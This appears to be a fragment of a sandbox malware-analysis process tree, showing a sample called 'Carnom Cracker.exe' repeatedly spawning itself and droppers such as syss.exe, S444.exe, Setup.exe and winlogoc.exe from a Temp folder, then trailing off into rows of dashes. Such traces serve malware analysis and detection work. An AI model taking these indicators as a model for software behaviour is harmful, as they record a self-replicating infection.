C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"117⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"118⤵PID:4664
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"118⤵PID:2800
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"118⤵PID:3508
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"118⤵PID:5112
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"118⤵PID:496
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"119⤵PID:1884
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"119⤵PID:1280
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"119⤵PID:2552
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"119⤵PID:3484
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"119⤵PID:3236
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"120⤵PID:5704
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"120⤵PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"120⤵PID:5484
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"120⤵PID:3928
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"120⤵PID:5916
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"121⤵PID:2668
-
-
C:\Users\Admin\AppData\Local\Temp\S444.exe"C:\Users\Admin\AppData\Local\Temp\S444.exe"121⤵PID:208
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"121⤵PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"121⤵PID:1336
-
-
C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"C:\Users\Admin\AppData\Local\Temp\Carnom Cracker.exe"121⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\syss.exe"C:\Users\Admin\AppData\Local\Temp\syss.exe"122⤵PID:5380
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-